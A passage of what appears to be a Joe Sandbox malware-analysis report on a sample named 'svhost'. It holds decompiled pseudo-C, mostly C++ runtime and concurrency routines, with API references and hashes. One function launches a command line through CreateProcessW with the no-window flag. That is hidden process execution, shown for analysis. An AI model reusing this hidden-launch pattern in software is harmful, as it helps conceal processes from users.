                                      				signed int _t35;
                                      				signed int _t36;
                                      				void* _t55;
                                      				void* _t58;
                                      				void* _t85;
                                      				void* _t86;
                                      				signed int _t87;
                                      
                                      				_t86 = __esi;
                                      				_t85 = __edi;
                                      				_t58 = __ebx;
                                      				_t35 =  *0xeef074; // 0x221cac15
                                      				_t36 = _t35 ^ _t87;
                                      				_v20 = _t36;
                                      				 *[fs:0x0] =  &_v16;
                                      				_v32 = __ecx;
                                      				E00E515C0( &_v28, 8);
                                      				 *((intOrPtr*)( *((intOrPtr*)( *_a4 + 8))))( &_v28, _t36,  *[fs:0x0], 0xec02b8, 0xffffffff);
                                      				_v8 = 0;
                                      				if((E00E54650(_v32) & 0x000000ff) == 0) {
                                      					L6:
                                      					_t83 = _a4;
                                      					E00E54920(_t58, E00E5A440( &_v28), _t85, _t86, _a4);
                                      					_v8 = 0xffffffff;
                                      					E00E56EC0();
                                      				} else {
                                      					_t83 = _a4;
                                      					if(( *(_a4 + 0x10) & 0x000000ff) != 0) {
                                      						goto L6;
                                      					} else {
                                      						if((E00E54680(_v32) & 0x000000ff) == 0) {
                                      							E00E542D0(E00E5A440( &_v28), 1);
                                      						} else {
                                      							_t55 = E00E546A0(_v32);
                                      							E00E54300(E00E5A440( &_v28), _t55, 1);
                                      						}
                                      						_v40 = _a4;
                                      						_v36 = _v40;
                                      						if(_v36 == 0) {
                                      							_v44 = 0;
                                      						} else {
                                      							_t83 =  *((intOrPtr*)( *_v36));
                                      							_v44 =  *((intOrPtr*)( *((intOrPtr*)( *_v36))))(1);
                                      						}
                                      						_v8 = 0xffffffff;
                                      						E00E56EC0();
                                      					}
                                      				}
                                      				 *[fs:0x0] = _v16;
                                      				return E00E89A35(_t58, _v20 ^ _t87, _t83, _t85, _t86);
                                      			}
                                      (Address column of the decompiler listing, 0x00e54800 to 0x00e5491c, detached from its source lines by extraction)

                                      APIs
                                      • Concurrency::details::_Task_impl_base::_IsCanceled.LIBCPMTD ref: 00E54850
                                      • Concurrency::details::_Task_impl_base::_CancelWithExceptionHolder.LIBCPMTD ref: 00E5488B
                                      • Concurrency::details::_Task_impl_base::_Cancel.LIBCPMTD ref: 00E5489E
                                      • std::_Container_base12::~_Container_base12.LIBCPMTD ref: 00E548C2
                                      • std::_Container_base12::~_Container_base12.LIBCPMTD ref: 00E548FF
                                        • Part of subcall function 00E54680: Concurrency::details::ScheduleGroupSegmentBase::HasUnrealizedChores.LIBCMTD ref: 00E5468D
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Concurrency::details::_Task_impl_base::_$CancelContainer_base12Container_base12::~_std::_$Base::CanceledChoresConcurrency::details::ExceptionGroupHolderScheduleSegmentUnrealizedWith
                                      • String ID:
                                      • API String ID: 1606484955-0
                                      • Opcode ID: 1414a6531dd41b4644d3267cb15a7b4b229f246cf3c7b611050e925943a3328b
                                      • Instruction ID: 24709b3a72661ac84663f40f515c15a91bd67aea3ed7d983a5cabbb8ef9c4821
                                      • Opcode Fuzzy Hash: 1414a6531dd41b4644d3267cb15a7b4b229f246cf3c7b611050e925943a3328b
                                      • Instruction Fuzzy Hash: AF316DB0A00209DBCB08EFA0C851BFEB7F1BF44315F105A29E9167B2D1DB746989CB80
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 84%
                                      			E00E52E10(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
                                      				signed int _v8;
                                      				char _v16;
                                      				signed int _v20;
                                      				char _v24;
                                      				signed int _v25;
                                      				intOrPtr _v32;
                                      				signed int _t25;
                                      				signed int _t26;
                                      				signed char _t31;
                                      				void* _t41;
                                      				void* _t60;
                                      				void* _t61;
                                      				signed int _t62;
                                      
                                      				_t61 = __esi;
                                      				_t60 = __edi;
                                      				_t41 = __ebx;
                                      				_push(0xffffffff);
                                      				_push(0xebfee8);
                                      				_push( *[fs:0x0]);
                                      				_t25 =  *0xeef074; // 0x221cac15
                                      				_t26 = _t25 ^ _t62;
                                      				_v20 = _t26;
                                      				_push(_t26);
                                      				 *[fs:0x0] =  &_v16;
                                      				_v32 = __ecx;
                                      				E00E57720(_a4 + 8, 0);
                                      				E00E528F0(_a4);
                                      				 *((intOrPtr*)(_a4 + 0x68)) = _v32;
                                      				_v25 = 1;
                                      				_t31 = E00E52DE0(_v32);
                                      				_t59 = _t31 & 0x000000ff;
                                      				if((_t31 & 0x000000ff) == 0) {
                                      					E00E57780( &_v24, _v32 + 0xc);
                                      					_v8 = 0;
                                      					if((E00E52DE0(_v32) & 0x000000ff) == 0) {
                                      						_v25 = 0;
                                      						_t59 = _a4;
                                      						E00E52C70(_v32 + 0x3c, _a4, _v32 + 0x3c, _a4);
                                      					}
                                      					_v8 = 0xffffffff;
                                      					E00E57740();
                                      				}
                                      				_t69 = _v25 & 0x000000ff;
                                      				if((_v25 & 0x000000ff) != 0) {
                                      					E00E52AD0(_t41, _a4, _t60, _t61, _t69);
                                      				}
                                      				 *[fs:0x0] = _v16;
                                      				return E00E89A35(_t41, _v20 ^ _t62, _t59, _t60, _t61);
                                      			}
                                      0x00e52e10
                                      0x00e52e10
                                      0x00e52e10
                                      0x00e52e13
                                      0x00e52e15
                                      0x00e52e20
                                      0x00e52e24
                                      0x00e52e29
                                      0x00e52e2b
                                      0x00e52e2e
                                      0x00e52e32
                                      0x00e52e38
                                      0x00e52e43
                                      0x00e52e4b
                                      0x00e52e56
                                      0x00e52e59
                                      0x00e52e60
                                      0x00e52e65
                                      0x00e52e6a
                                      0x00e52e76
                                      0x00e52e7b
                                      0x00e52e8f
                                      0x00e52e91
                                      0x00e52e95
                                      0x00e52e9f
                                      0x00e52e9f
                                      0x00e52ea4
                                      0x00e52eae
                                      0x00e52eae
                                      0x00e52eb7
                                      0x00e52eb9
                                      0x00e52ebe
                                      0x00e52ebe
                                      0x00e52ec6
                                      0x00e52edb

                                      APIs
                                      • Concurrency::details::_CancellationTokenState::_IsCanceled.LIBCONCRTD ref: 00E52E60
                                      • Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::_Scoped_lock.LIBCMTD ref: 00E52E76
                                      • Concurrency::details::_CancellationTokenState::_IsCanceled.LIBCONCRTD ref: 00E52E85
                                      • Concurrency::details::_CancellationTokenState::TokenRegistrationContainer::push_back.LIBCONCRTD ref: 00E52E9F
                                        • Part of subcall function 00E52C70: Concurrency::details::SweeperContext::SweeperContext.LIBCMTD ref: 00E52CB9
                                      • SafeRWList.LIBCONCRTD ref: 00E52EAE
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
• Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Concurrency::details::_Token$Cancellation$CanceledState::_Sweeper$Concurrency::details::Container::push_backContextContext::CriticalListLock::_ReentrantRegistrationSafeScoped_lockScoped_lock::_State::
                                      • String ID:
                                      • API String ID: 1150526973-0
                                      • Opcode ID: d2f10eb91f724489d7c330d0a5882bf8c903917665950eebbf80057622f8851c
                                      • Instruction ID: 52e927a1d967b8a19d34d9fe8f52d7f65c4cf43559cbdf16f34de116f4f2b7ea
                                      • Opcode Fuzzy Hash: d2f10eb91f724489d7c330d0a5882bf8c903917665950eebbf80057622f8851c
                                      • Instruction Fuzzy Hash: 1F217F70D041099BCB08EF94D852BBFBBB1EF45301F00951DE9127B2C2DB749908CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00E6E9A0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                      				signed int _v8;
                                      				struct _STARTUPINFOW _v76;
                                      				struct _PROCESS_INFORMATION _v92;
                                      				intOrPtr _v96;
                                      				signed int _t16;
                                      				void* _t31;
                                      				void* _t42;
                                      				signed int _t43;
                                      
                                      				_t42 = __esi;
                                      				_t41 = __edi;
                                      				_t31 = __ebx;
                                      				_t16 =  *0xeef074; // 0x221cac15
                                      				_v8 = _t16 ^ _t43;
                                      				_v96 = __ecx;
                                      				if((E00E579A0(_a4) & 0x000000ff) == 0) {
                                      					E00EA1270(__edi,  &_v76, 0, 0x44);
                                      					_t40 = 0;
                                      					_v92.hProcess = 0;
                                      					_v92.hThread = 0;
                                      					_v92.dwProcessId = 0;
                                      					_v92.dwThreadId = 0;
                                      					if(CreateProcessW(0, E00E57A40(), 0, 0, 1, 0x8000000, 0, 0,  &_v76,  &_v92) == 0) {
                                      						goto L3;
                                      					} else {
                                      						_t40 = _v92.hProcess;
                                      						WaitForSingleObject(_v92.hProcess, 0xffffffff);
                                      						CloseHandle(_v92.hThread);
                                      						CloseHandle(_v92);
                                      					}
                                      				}
                                      				return E00E89A35(_t31, _v8 ^ _t43, _t40, _t41, _t42);
                                      			}
                                      0x00e6e9a0
                                      0x00e6e9a0
                                      0x00e6e9a0
                                      0x00e6e9a6
                                      0x00e6e9ad
                                      0x00e6e9b0
                                      0x00e6e9c0
                                      0x00e6e9ca
                                      0x00e6e9d2
                                      0x00e6e9d4
                                      0x00e6e9d7
                                      0x00e6e9da
                                      0x00e6e9dd
                                      0x00e6ea0a
                                      0x00000000
                                      0x00e6ea0c
                                      0x00e6ea0e
                                      0x00e6ea12
                                      0x00e6ea1c
                                      0x00e6ea26
                                      0x00e6ea2c
                                      0x00e6ea0a
                                      0x00e6ea3f

                                      APIs
                                      • std::ios_base::good.LIBCPMTD ref: 00E6E9B6
                                      • CreateProcessW.KERNEL32 ref: 00E6EA02
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E6EA12
                                      • CloseHandle.KERNEL32(?), ref: 00E6EA1C
                                      • CloseHandle.KERNEL32(?), ref: 00E6EA26
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
• Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandle$CreateObjectProcessSingleWaitstd::ios_base::good
                                      • String ID:
                                      • API String ID: 1339197284-0
                                      • Opcode ID: b7854c6b4091f02e4b7cca735b3053e1ea33ee39c49c0e8a545d04bfcbf61d76
                                      • Instruction ID: 7ac7ddc7e4b1366eb831b832fbe4d9bb5b7314b9acba289023ee854140843bdb
                                      • Opcode Fuzzy Hash: b7854c6b4091f02e4b7cca735b3053e1ea33ee39c49c0e8a545d04bfcbf61d76
                                      • Instruction Fuzzy Hash: D81182B5A40208AFDB14EFE5DC42FDEBBB4AF54700F104129F60ABB2D0EA71A5098B55
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 79%
                                      			E00E56D20(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8) {
                                      				intOrPtr _v8;
                                      				char _v16;
                                      				intOrPtr _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				intOrPtr _v36;
                                      				char _v44;
                                      				signed int _t22;
                                      				intOrPtr _t27;
                                      				void* _t31;
                                      				void* _t32;
                                      				signed int _t53;
                                      				void* _t54;
                                      				intOrPtr _t56;
                                      				void* _t57;
                                      
                                      				_push(0xffffffff);
                                      				_push(0xec0528);
                                      				_push( *[fs:0x0]);
                                      				_t22 =  *0xeef074; // 0x221cac15
                                      				 *[fs:0x0] =  &_v16;
                                      				_v20 = __ecx;
                                      				_v8 = 0;
                                      				_t56 = _t54 - 0x10;
                                      				_v32 = _t56;
                                      				E00E53610(_t56,  &_a8);
                                      				_t27 = E00E58820(__ebx, __edi, __esi, __eflags,  &_v44, _a4, _t22 ^ _t53);
                                      				_t57 = _t56 + 0x14;
                                      				_v24 = _t27;
                                      				_v28 = _v24;
                                      				E00E58700(_v20, __eflags, _v28);
                                      				E00E56EC0();
                                      				_t31 = E00E52DD0();
                                      				_t60 = _a4 - _t31;
                                      				if(_a4 != _t31) {
                                      					_v36 = _t57 - 8;
                                      					E00E572A0(_v20);
                                      					E00E543E0(__ebx, E00E5A440(_v20), _v20, __edi, __esi, _t60);
                                      				}
                                      				_v8 = 0xffffffff;
                                      				_t32 = E00E535F0( &_a8);
                                      				 *[fs:0x0] = _v16;
                                      				return _t32;
                                      			}
                                      0x00e56d23
                                      0x00e56d25
                                      0x00e56d30
                                      0x00e56d34
                                      0x00e56d3f
                                      0x00e56d45
                                      0x00e56d48
                                      0x00e56d4f
                                      0x00e56d54
                                      0x00e56d5b
                                      0x00e56d68
                                      0x00e56d6d
                                      0x00e56d70
                                      0x00e56d76
                                      0x00e56d80
                                      0x00e56d88
                                      0x00e56d8d
                                      0x00e56d92
                                      0x00e56d95
                                      0x00e56d9c
                                      0x00e56da3
                                      0x00e56db2
                                      0x00e56db2
                                      0x00e56db7
                                      0x00e56dc1
                                      0x00e56dc9
                                      0x00e56dd4

                                      APIs
                                      • Concurrency::scheduler_ptr::scheduler_ptr.LIBCPMTD ref: 00E56D5B
                                        • Part of subcall function 00E53610: shared_ptr.LIBCPMTD ref: 00E5361E
                                      • _Task_ptr.LIBCPMTD ref: 00E56D68
                                      • shared_ptr.LIBCMTD ref: 00E56D80
                                        • Part of subcall function 00E58700: shared_ptr.LIBCPMTD ref: 00E5871D
                                        • Part of subcall function 00E58700: std::_Container_base12::~_Container_base12.LIBCPMTD ref: 00E5872C
                                      • std::_Container_base12::~_Container_base12.LIBCPMTD ref: 00E56D88
                                        • Part of subcall function 00E56EC0: _Ptr_base.LIBCMTD ref: 00E56EE9
                                      • shared_ptr.LIBCPMTD ref: 00E56DA3
                                        • Part of subcall function 00E572A0: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00E572C9
                                        • Part of subcall function 00E572A0: _Copy_construct_from.LIBCPMTD ref: 00E572D5
                                        • Part of subcall function 00E543E0: _DebugHeapAllocator.LIBCPMTD ref: 00E54423
                                        • Part of subcall function 00E543E0: std::_Container_base12::~_Container_base12.LIBCPMTD ref: 00E544A0
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
• Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: shared_ptrstd::_$Container_base12Container_base12::~_$AllocatorConcurrency::scheduler_ptr::scheduler_ptrCopy_construct_fromDebugHeapIterator_baseIterator_base::_Ptr_baseTask_ptr
                                      • String ID:
                                      • API String ID: 961000812-0
                                      • Opcode ID: 67ffad096323bfa26d19e500674499844409eeee3defe42aae6ba993036ab19e
                                      • Instruction ID: 213f97bdb201e72204ffb5f42dff99723365f21613d10897b87da26b958bbadf
                                      • Opcode Fuzzy Hash: 67ffad096323bfa26d19e500674499844409eeee3defe42aae6ba993036ab19e
                                      • Instruction Fuzzy Hash: 691151B5D00209DBCB04EFA4D942AEEBBF5EB48711F505A2DF815B7281EB345A08CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00EB7CF0(intOrPtr* _a4) {
                                      				intOrPtr _t6;
                                      				intOrPtr* _t21;
                                      				void* _t23;
                                      				void* _t24;
                                      				void* _t25;
                                      				void* _t26;
                                      				void* _t27;
                                      
                                      				_t21 = _a4;
                                      				if(_t21 != 0) {
                                      					_t23 =  *_t21 -  *0xeef250; // 0xeef2a4
                                      					if(_t23 != 0) {
                                      						E00EB051F(_t7);
                                      					}
                                      					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0xeef254; // 0xef350c
                                      					if(_t24 != 0) {
                                      						E00EB051F(_t8);
                                      					}
                                      					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0xeef258; // 0xef350c
                                      					if(_t25 != 0) {
                                      						E00EB051F(_t9);
                                      					}
                                      					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0xeef280; // 0xeef2a8
                                      					if(_t26 != 0) {
                                      						E00EB051F(_t10);
                                      					}
                                      					_t6 =  *((intOrPtr*)(_t21 + 0x34));
                                      					_t27 = _t6 -  *0xeef284; // 0xef3510
                                      					if(_t27 != 0) {
                                      						return E00EB051F(_t6);
                                      					}
                                      				}
                                      				return _t6;
                                      			}
                                      0x00eb7cf6
                                      0x00eb7cfb
                                      0x00eb7cff
                                      0x00eb7d05
                                      0x00eb7d08
                                      0x00eb7d0d
                                      0x00eb7d11
                                      0x00eb7d17
                                      0x00eb7d1a
                                      0x00eb7d1f
                                      0x00eb7d23
                                      0x00eb7d29
                                      0x00eb7d2c
                                      0x00eb7d31
                                      0x00eb7d35
                                      0x00eb7d3b
                                      0x00eb7d3e
                                      0x00eb7d43
                                      0x00eb7d44
                                      0x00eb7d47
                                      0x00eb7d4d
                                      0x00000000
                                      0x00eb7d55
                                      0x00eb7d4d
                                      0x00eb7d58

                                      APIs
                                      • _free.LIBCMT ref: 00EB7D08
                                        • Part of subcall function 00EB051F: HeapFree.KERNEL32(00000000,00000000,?,00EB7F92,?,00000000,?,?,?,00EB8235,?,00000007,?,?,00EB8728,?), ref: 00EB0535
                                        • Part of subcall function 00EB051F: GetLastError.KERNEL32(?,?,00EB7F92,?,00000000,?,?,?,00EB8235,?,00000007,?,?,00EB8728,?,?), ref: 00EB0547
                                      • _free.LIBCMT ref: 00EB7D1A
                                      • _free.LIBCMT ref: 00EB7D2C
                                      • _free.LIBCMT ref: 00EB7D3E
                                      • _free.LIBCMT ref: 00EB7D50
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
• Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: b84e0571d2ab73736979fe4e923ceda1cfa9eca0b37602a4955d36a6dc58bc1f
                                      • Instruction ID: 5adce7cbc3a93a4372bf05c6ea0d80bb71f4897ec07210d253a19b17c1a606b1
                                      • Opcode Fuzzy Hash: b84e0571d2ab73736979fe4e923ceda1cfa9eca0b37602a4955d36a6dc58bc1f
                                      • Instruction Fuzzy Hash: B3F06232509648AFC630EB65E9C5CAB73DAAF897543643815F248FBD20C730FD804B54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 96%
                                      			E00E64C70(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                      				signed int _v8;
                                      				char _v12;
                                      				void* _v16;
                                      				intOrPtr _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				intOrPtr _v36;
                                      				intOrPtr _v40;
                                      				char _v44;
                                      				intOrPtr _v48;
                                      				signed int _t65;
                                      				void* _t69;
                                      				void* _t87;
                                      				signed int _t140;
                                      
                                      				_t139 = __esi;
                                      				_t138 = __edi;
                                      				_t99 = __ebx;
                                      				_t65 =  *0xeef074; // 0x221cac15
                                      				_v8 = _t65 ^ _t140;
                                      				_v20 = __ecx;
                                      				_v16 = E00E51100(_v20);
                                      				_v24 =  *((intOrPtr*)(_v16 + 0x10));
                                      				_t69 = E00E596F0(__ebx, _v20, __edi, __esi, __eflags);
                                      				_t147 = _t69 - _v24 - _a4;
                                      				if(_t69 - _v24 < _a4) {
                                      					E00E5BFD0();
                                      				}
                                      				_v32 = _v24 + _a4;
                                      				_v40 =  *((intOrPtr*)(_v16 + 0x14));
                                      				_v36 = E00E5C0F0(_t99, _v20, _v32, _t138, _t139, _t147, _v32);
                                      				_v28 = E00E56580(_v20);
                                      				_v12 = E00E59B70(_v28, _t147,  ~(0 | _t147 > 0x00000000) | _v36 + 0x00000001);
                                      				E00E516F0(_t78, _v16);
                                      				 *((intOrPtr*)(_v16 + 0x10)) = _v32;
                                      				 *((intOrPtr*)(_v16 + 0x14)) = _v36;
                                      				_v48 = E00E51650(_v12);
                                      				if(_v40 < 0x10) {
                                      					E00E64070( &_a8, _v48, _v16, _v24, _a12, _a16, _a20, _a24);
                                      					_t87 = E00E51650(_v16);
                                      					_t134 = _v28;
                                      					E00E5B410(_v16, _v28, _t87,  &_v12);
                                      				} else {
                                      					asm("lfence");
                                      					_v44 =  *_v16;
                                      					_t44 =  &_v44; // 0xe64062
                                      					E00E64070( &_a8, _v48, E00E51650( *_t44), _v24, _a12, _a16, _a20, _a24);
                                      					_t48 =  &_v44; // 0xe64062
                                      					_t134 =  *_t48;
                                      					E00E59BA0(_v28,  *_t48, _v40 + 1);
                                      					 *_v16 = _v12;
                                      				}
                                      				return E00E89A35(_t99, _v8 ^ _t140, _t134, _t138, _t139);
                                      			}
                                      0x00e64c70
                                      0x00e64c70
                                      0x00e64c70
                                      0x00e64c76
                                      0x00e64c7d
                                      0x00e64c80
                                      0x00e64c8b
                                      0x00e64c94
                                      0x00e64c9a
                                      0x00e64ca2
                                      0x00e64ca5
                                      0x00e64ca7
                                      0x00e64ca7
                                      0x00e64cb2
                                      0x00e64cbb
                                      0x00e64cca
                                      0x00e64cd5
                                      0x00e64cf0
                                      0x00e64cf6
                                      0x00e64d01
                                      0x00e64d0a
                                      0x00e64d19
                                      0x00e64d20
                                      0x00e64d96
                                      0x00e64da3
                                      0x00e64dac
                                      0x00e64db0
                                      0x00e64d22
                                      0x00e64d22
                                      0x00e64d2a
                                      0x00e64d41
                                      0x00e64d55
                                      0x00e64d61
                                      0x00e64d61
                                      0x00e64d68
                                      0x00e64d73
                                      0x00e64d73
                                      0x00e64dc8

                                      APIs
                                        • Part of subcall function 00E596F0: _Max_value.LIBCPMTD ref: 00E59726
                                        • Part of subcall function 00E596F0: _Min_value.LIBCPMTD ref: 00E5974C
                                      • allocator.LIBCONCRTD ref: 00E64CEB
                                      • allocator.LIBCONCRTD ref: 00E64D68
                                      • construct.LIBCPMTD ref: 00E64DB0
                                      Strings
                                      Memory Dump Source
• Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
• Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: allocator$Max_valueMin_valueconstruct
                                      • String ID: b@
                                      • API String ID: 3172100163-3405210070
                                      • Opcode ID: 8a96d02773b1f6527ef613b9a60ad3db25e99acde5aff12114e025d116a37bae
                                      • Instruction ID: fdd93ebf82b6f2104a18d59220004639c48025be0713e8c864e4c54f8f4c6c54
                                      • Opcode Fuzzy Hash: 8a96d02773b1f6527ef613b9a60ad3db25e99acde5aff12114e025d116a37bae
                                      • Instruction Fuzzy Hash: 8051C3B5E00109AFCB48DFA8D8919EFB7F5EF8C300B108559E919B7351DB30AA45CBA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 96%
                                      			E00E64AA0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                      				signed int _v8;
                                      				char _v12;
                                      				intOrPtr* _v16;
                                      				intOrPtr _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				char _v32;
                                      				intOrPtr _v36;
                                      				intOrPtr _v40;
                                      				intOrPtr _v44;
                                      				intOrPtr _v48;
                                      				signed int _t63;
                                      				void* _t67;
                                      				signed int _t136;
                                      
                                      				_t135 = __esi;
                                      				_t134 = __edi;
                                      				_t98 = __ebx;
                                      				_t63 =  *0xeef074; // 0x221cac15
                                      				_v8 = _t63 ^ _t136;
                                      				_v20 = __ecx;
                                      				_v16 = E00E51100(_v20);
                                      				_v24 =  *((intOrPtr*)(_v16 + 0x10));
                                      				_t67 = E00E596F0(__ebx, _v20, __edi, __esi, __eflags);
                                      				_t143 = _t67 - _v24 - _a4;
                                      				if(_t67 - _v24 < _a4) {
                                      					E00E5BFD0();
                                      				}
                                      				_v32 = _v24 + _a4;
                                      				_v40 =  *((intOrPtr*)(_v16 + 0x14));
                                      				_t17 =  &_v32; // 0xe6363e
                                      				_v36 = E00E5C0F0(_t98, _v20,  *_t17, _t134, _t135, _t143,  *_t17);
                                      				_v28 = E00E56580(_v20);
                                      				_v12 = E00E59B70(_v28, _t143,  ~(0 | _t143 > 0x00000000) | _v36 + 0x00000001);
                                      				E00E516F0(_t76, _v16);
                                      				_t29 =  &_v32; // 0xe6363e
                                      				 *((intOrPtr*)(_v16 + 0x10)) =  *_t29;
                                      				 *((intOrPtr*)(_v16 + 0x14)) = _v36;
                                      				_v48 = E00E51650(_v12);
                                      				if(_v40 < 0x10) {
                                      					E00E63650( &_a8, _v48, _v16, _v24, _a12, _a16, _a20);
                                      					_t130 = _v16;
                                      					E00E5B410( &_v12, _v28, E00E51650(_v16),  &_v12);
                                      				} else {
                                      					asm("lfence");
                                      					_v44 =  *_v16;
                                      					E00E63650( &_a8, _v48, E00E51650(_v44), _v24, _a12, _a16, _a20);
                                      					E00E59BA0(_v28, _v44, _v40 + 1);
                                      					_t130 = _v16;
                                      					 *_v16 = _v12;
                                      				}
